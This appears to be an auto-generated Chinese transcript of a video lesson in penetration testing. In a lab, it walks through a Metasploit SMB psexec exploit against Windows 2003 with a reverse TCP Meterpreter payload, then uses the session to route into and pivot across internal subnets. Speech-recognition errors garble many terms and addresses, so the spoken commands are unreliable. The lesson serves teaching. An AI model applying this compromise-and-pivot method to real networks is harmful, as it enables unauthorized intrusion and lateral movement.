请不吝点赞 订阅 转发 打赏支持明镜与点点栏目 没有这个环境来做 我来手说一下 当你得到了matter pattern之后 你可以win然后getlocal subnet 这个是不行的 我们来找一个 我们先来找一个windows2003 我们来找一个windows2003来试 我去 然后看一下我们这个windows2003 上次没有演示成 这次给大家演示一下 看一下ip 我们关键可设可不设 通了 然后150看个通知 主要是他 120 120 OK通了 没什么问题 我们来看一下 我还是一样 我们既然都会溢出了 那么找哪个溢出都是一样的 所以说我还是喜欢用 我最喜欢用的 还是exploit 然后windows的 smb的 然后pxex pxex 然后我们来看一下 setrhost 然后是292.168.1.110 我ip地址记得不是很熟 然后呢 set smb pass password 然后是 当然这个是你要扫出来 如果你要扫不出来的话 这没一样 然后set smb smbuser 说的是admin admin admin 然后set payload 然后这个就是windows matter pattern 然后reserve matter pattern 然后反弹 pcp 好 show options 然后呢 set lhost 然后是 192.168.1.120 然后呢 如果说怕这个端口有冲突 因为刚才起了一个matter pattern 有端口有冲突呢 我们可以把这个lport 给改一下lport 然后比如说555吧 好 ok 然后呢 我们exploit ex 直接回车 ok 好了 我们就得到一个matter pattern 我们得到一个matter pattern之后呢 我们可以background 让它回来之后 我们用 我们先先这样 sessions 然后呢 -i 然后1 这样呢 进到了它这个matter pattern里边 我刚才打background 退出来 也可以用ctrl加ctrl加b 然后也能退出去啊 也能退出去 也能退到这个background里边 你也可以打background 然后好了 我们留在这个matter pattern里边 我们可以runget 可以rungetlocalsubnet 我们可以看 它这有两个网络 192的168 1.0和2.2.2.0 这个网络 就是实际 我来讲一个实际的案例啊 我来讲一个实际的案例 嗯 这里就不演示了 我给大家做一个 我来讲一个 一般大家在做一些 比如说是在做一些 那个安全检测 或者安全渗透测试的时候 肯定不可能会出现 两个机器 这个机器肯定不可能 一般来说啊 不会出现 你们仨在同一个网络 然后你们仨连了一个交换机 那也有可能啊 也有可能 但是呢 更多的情况呢 有可能是这个样子的 更多的情况有可能是 比如说这个机器是一个wibe 或者是一个其他的机器 它的ip呢 比如它有两块网卡 它有两块网卡 然后呢 或者是它有一块 我们来说 我们来说两个吧 我们分着来说 如果说呢 一般来说 这是一个 这比如说 这是一个边界网络啊 这是一个边界网络 这是有一个路由器 这是在一个边上 这个是连的internet 这个是连的是internet 然后呢 你的你的机器在这 就是你的 比如说你的bt5在这 然后呢 也上internet 然后呢 它这个上面呢 比如说是有两台机器 第一台机器 就是3w的机器 比如说呢 这个是一个啊 比如说这是3w的机器 然后呢 再比如说呢 这个是一个有漏洞的机器啊 我们就直接写写中文了 我也不写什么 有漏洞的机器 它是也有漏洞的 一般就相当于 这就相当于一个有漏洞 但是呢 这台有漏洞的机器呢 人家呢 是给它放在了内网里 相对于来说呢 这比如说这是外网 这是外网 然后呢 这是内网 而它会把这个3w 这个服务器的80口呢 做一个映射 哎 我给它做到这个这个上面 比如说呢 你访问这个 它3w的没有什么问题 那么这个时候呢 你使用了BT5 比如说是 你把它这个机器 攻下来之后 比如说这个网段 比如说他们的内网 他们外网是 202.100 1.1.1吧 他们的内网 比如说是192 198 然后比如说是 10段了吧 10.x 比如这是点1 这是点2 那么 你这台机器 肯定是无法访问到 人家有漏洞的这台机器 对吧 你肯定是无法访问到 这个有漏洞的机器了 那么这个时候怎么办呢 这个时候呢 你还得到了192 168 1.x 这个权限 你得到了1.1 这个权限 你通过 通过不管是通过什么办法 你得到这台机器的权限 那么 这个时候呢 你就可以 因为你这个MSF 毕竟还是在这吧 对吧 你这个MSF 毕竟在这 那么你就想 可不可以通过它 做一个跳板 然后呢 来对它呢 进行一个攻击呢 那么这就是可以的 这个时候呢 你就需要在这个 Matter Pattern下面 在这 在这 可以看到啊 我们先可以看到 比如说 它这个网段 有2.2.0 这个网段啊 比如说2.2.0 这个网段 我们在Background 回来 我们Session 我们Root ADD 2.2.2.0 然后是255.25 25.0 然后1 看啊 这已经加上去了 我们Root Print一下 我们Root Print 也就是说呢 通往2.2.2.0 走的是Session1 就是通过这个Session1 就是现在我们可以看到的这个Session 就是通过这个Session1 大家可以看 这样走过去了 也就是说呢 我们以后 如果说 切换到这个网络 相当于 以后我们在使用 我们在使用 MSF的时候 可以借助它 然后呢 做一个跳板 然后来 把这个有漏洞的机器 这一块大家可不可以理解了 相当于做了一个跳板 这 这个是对在 做一些 比如说是在外网渗透的时候 或者是隔微烂 比如说还有一个例子啊 还有一个例子 就是这个样子 这是第一个例子啊 再来一个例子 压个例子 相当于它有两个网卡 或者是它有两个微烂 但是微烂之间不通 它有 比如说这有两个网卡 它有两个网卡 这是机器 其实原理都差不多啊 这是一个主机 这是一个主机 它有两个网卡 你的BT在这儿 就是说呢 你只能访问这台机器 但是呢 你访问不了这台机器 但是呢 由于其他原因 是不是由于什么原因 你访问不了 但是它俩之间还是通的 但是呢 这几个是一个网段 比如这是 这是1.0这个网段 那么这个是2.0这个网段 你能访问它 但是呢 你不能访问它 这样的话 这样是一个例子 这样是一个例子 就是说你能访问 你能访问它 也可以通过它做一个跳板 然后来过去 这是一个啊 还有一个就是 比如说你们仨 就是我第一个说的 你们仨确实 确实是在一个微烂啊 就是你们仨确实在一个微烂 都在192.168 192.168.1.0 这个微烂里边选 但是呢 比如说这是2 这是3 这是你是1 但是你只能访问2 但是访问不了3 是可以这么干的 这是有类似于一种 一种叫做单向访问 单向访问啊 或者什么的 就是说 但是3呢 确实能访问1 还能访问2 2呢访问访问1 当然也能访问3 那么这样的话 如果说你1能访问3 但是3 你能访 你能访问 你访问不了3 但是3能访问1 这个叫做单向访问啊 这是可以做的啊 有同学知道单向的ACL 单向的ACL 这都是 这都是那个什么 就相当于你能访问它 它访问不了你 或者是 或者想象反的 这个时候呢 你也可以通过这个办法 然后呢 把它当作一个跳板 然后再来防它 总之基本上就是 嗯 无孔不入啊 当然你前提 你应该是有一个 matter pattern啊 怎么写我也有点忘啊 就是说 你前提 你要一定要做一个matter pattern 那天我做实验失败了 就是因为没有matter pattern 有一个fession 可能是不行啊 所以说呢 matter pattern可以干这个事 你要有一个matter pattern 出现一个fession 那么这样的话呢 你就可以得到一个 得到一个路 也就是说呢 我们现在 所有的机器 如果说想去2.0的话 我们可以去2.0的话 这个session呢 就会我们打通一条隧道 呃 有点像这个概念 有点类似于这个概念 包裂机的概念 没有错 所以我会讨论